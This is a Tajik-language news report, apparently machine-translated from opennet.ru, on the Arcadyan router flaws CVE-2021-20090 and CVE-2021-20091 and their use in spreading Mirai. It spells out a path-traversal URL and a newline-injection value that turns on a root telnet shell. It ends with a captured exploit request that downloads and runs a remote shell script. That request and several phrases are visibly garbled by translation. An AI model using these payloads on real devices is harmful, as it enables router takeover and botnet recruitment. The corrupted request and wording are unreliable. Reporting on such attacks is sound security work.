Ҳамлаи азим дар шабака бар зидди роутерҳои хонагӣ сабт шудааст, ки нармафзори онҳо татбиқи сервери HTTP-ро аз ширкати Arcadyan истифода мебарад. Барои ба даст овардани назорат аз болои дастгоҳҳо, маҷмӯи ду осебпазирӣ истифода мешавад, ки имкон медиҳад, ки коди худсарона бо ҳуқуқи реша иҷро карда шавад. Мушкилот ба доираи хеле васеи роутерҳои ADSL аз Arcadyan, ASUS ва Buffalo, инчунин дастгоҳҳои таҳти тамғаҳои Beeline додашуда (масъала дар Smart Box Flash тасдиқ карда шудааст), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone ва дигар операторони алоқа. Қайд карда мешавад, ки мушкилот дар нармафзори Arcadyan зиёда аз 10 сол вуҷуд дорад ва дар ин муддат тавонист ҳадди ақалл ба 20 модели дастгоҳҳои 17 истеҳсолкунандагони гуногун гузарад.
Аввалин осебпазирии CVE-2021-20090 имкон медиҳад, ки ба ҳама гуна скрипти интерфейси веб бе аутентификатсия дастрасӣ пайдо кунед. Моҳияти осебпазирӣ дар он аст, ки дар интерфейси веб баъзе директорияҳое, ки тавассути онҳо тасвирҳо, файлҳои CSS ва скриптҳои JavaScript фиристода мешаванд, бидуни аутентификатсия дастрас мебошанд. Дар ин ҳолат, директорияҳое, ки ба онҳо дастрасӣ бе аутентификатсия иҷозат дода шудааст, бо истифода аз ниқоби ибтидоӣ тафтиш карда мешаванд. Муайян кардани аломатҳои "../" дар роҳҳо барои рафтан ба директорияи волидайн аз ҷониби нармафзори миёнаравӣ баста мешавад, аммо истифодаи комбинатсияи "..% 2f" гузаронида мешавад. Ҳамин тариқ, ҳангоми фиристодани дархостҳо ба монанди “http://192.168.1.1/images/..%2findex.htm” саҳифаҳои муҳофизатшавандаро кушодан мумкин аст.
Зангирии дуюм, CVE-2021-20091, ба корбари тасдиқшуда имкон медиҳад, ки ба танзимоти системаи дастгоҳ тавассути фиристодани параметрҳои махсус форматшуда ба скрипти apply_abstract.cgi, ки мавҷудияти аломати сатри навро дар параметрҳо тафтиш намекунад, тағирот ворид кунад. . Масалан, ҳангоми иҷрои амалиёти пинг, ҳамлакунанда метавонад арзиши “192.168.1.2%0AARC_SYS_TelnetdEnable=1”-ро дар майдон бо суроғаи IP тафтишшаванда ва скриптро ҳангоми сохтани файли танзимот /tmp/etc/config/ муайян кунад. .glbcfg, сатри "AARC_SYS_TelnetdEnable=1"-ро дар он "менависад, ки сервери telnetd-ро фаъол мекунад, ки дастрасии бемаҳдуд ба қабати фармонро бо ҳуқуқи реша таъмин мекунад. Ба ҳамин монанд, бо гузоштани параметри AARC_SYS, шумо метавонед ҳама гуна кодро дар система иҷро кунед. Зангирии аввал имкон медиҳад, ки скрипти мушкилотро бидуни аутентификатсия тавассути дастрасӣ ба он ҳамчун “/images/..%2fapply_abstract.cgi” иҷро кунед.
Барои истифодаи осебпазирӣ, ҳамлакунанда бояд қодир бошад, ки ба порти шабака, ки дар он интерфейси веб кор мекунад, дархост фиристад. Аз рӯи динамикаи паҳншавии ҳамла, бисёр операторҳо дастрасӣ ба дастгоҳҳои худро аз шабакаи беруна тарк мекунанд, то ташхиси мушкилотро аз ҷониби хидмати дастгирӣ содда кунанд. Агар дастрасӣ ба интерфейс танҳо бо шабакаи дохилӣ маҳдуд бошад, ҳамла метавонад аз шабакаи беруна бо истифода аз техникаи "rebinding DNS" анҷом дода шавад. Барои пайваст кардани роутерҳо ба ботнети Mirai осебпазириҳо аллакай фаъолона истифода мешаванд: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Пайвастшавӣ: пӯшонидани корбар-агент: Action Dark=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_ping=212.192.241.7_0.i. 1%0A ARC_SYS_TelnetdEnable=212.192.241.72& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://777/lolol.sh; curl+-O+http://0/lolol.sh; chmod+4+lolol.sh; sh+lolol.sh&ARC_ping_status=XNUMX&TMP_Ping_Type=XNUMX
Манбаъ: opennet.ru